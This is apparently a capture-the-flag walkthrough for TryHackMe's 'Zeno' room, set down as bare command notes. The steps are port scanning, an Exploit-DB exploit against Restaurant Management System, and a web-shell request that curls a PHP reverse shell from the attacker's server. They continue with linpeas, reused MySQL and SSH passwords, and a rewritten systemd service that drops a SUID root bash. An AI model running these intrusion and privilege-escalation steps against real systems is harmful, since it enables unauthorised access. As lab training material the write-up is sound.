Room Link: https://tryhackme.com/room/zeno
Scans
Initial scan
Kali
Longer scan
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/12340- HTTP
Kali
gobuster dir -u http://$VICTIM:12340 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Restaurant Management System Exploit
Exploit: https://www.exploit-db.com/raw/47520
The code needed some fixing up
From
To
Kali
python exploit.py http://$VICTIM:12340/rms/
Kali
git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php
Kali
python2 -m SimpleHTTPServer 81
Browser
http://$VICTIM:12340/rms/images/reverse-shell.php?cmd=curl%20-O%20http://10.10.57.58:81/php-reverse-shell.php
Kali
Browser
Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
LinPeas
Kali
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
python2 -m SimpleHTTPServer 81
Victim
cd /tmp/
curl -O http://$KALI:81/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
MySQL
Victim
mysql -u root -pveerUffIrangUfcubyig
Victim(mysql)
show databases;
use dbrms;
show tables;
select * from members;
Edwards password was still not found
I went back to linpeas and found another password, it's for a different user but it still worked.
TCP/22- SSH
Kali
ssh edward@$VICTIM
Password: FrobjoodAdkoonceanJa
Victim(edward)
Victim(apache)
find /etc -type f -perm /g=w -exec ls -l {} + 2> /dev/null
Victim(apache)
vi /etc/systemd/system/zeno-monitoring.service
From
To
[Unit]
Description=Zeno monitoring
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'cp /bin/bash /home/edward/bash_root; chmod +xs /home/edward/bash_root'
[Install]
WantedBy=multi-user.target
Victim(edward)
sudo /usr/sbin/reboot
Kali
ssh edward@$VICTIM
Password: FrobjoodAdkoonceanJa
Victim(edward)
ls -lah
./bash_root -p
